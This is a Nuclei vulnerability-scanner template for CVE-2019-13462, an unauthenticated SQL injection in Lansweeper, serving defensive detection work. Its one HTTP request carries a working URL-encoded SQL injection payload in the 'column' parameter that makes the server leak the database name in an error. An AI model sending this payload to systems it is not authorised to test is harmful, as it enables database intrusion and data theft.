nuclei-templates/http/cves/2019/CVE-2019-13462.yaml

51 lines
1.9 KiB
YAML

id: CVE-2019-13462
info:
name: Lansweeper Unauthenticated SQL Injection
author: divya_mudgal
severity: critical
description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.
impact: |
This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Lansweeper system.
remediation: |
Apply the latest security patch or update provided by Lansweeper to fix the SQL Injection vulnerability.
reference:
- https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
- https://nvd.nist.gov/vuln/detail/CVE-2019-13462
- https://www.nccgroup.trust/uk/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
- https://www.lansweeper.com/forum/yaf_topics33_Announcements.aspx
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2019-13462
cwe-id: CWE-89
epss-score: 0.41579
epss-percentile: 0.96947
cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: lansweeper
product: lansweeper
tags: cve,cve2019,sqli,lansweeper
http:
- method: GET
path:
- '{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "~lansweeperdb~"
- type: word
part: header
words:
- text/plain
- type: status
status:
- 500
# digest: 4b0a00483046022100cabc6959d31f577540a9fe7e3b5d6bd9a157b225ddc85b706976db22dd0ef7ef022100ffc22dd2e7fa31ef70fe00e0dd886fa7c0e87e4ee5a1303a1b2384d93b89ed39:922c64590222798bb761d5b6d8e72950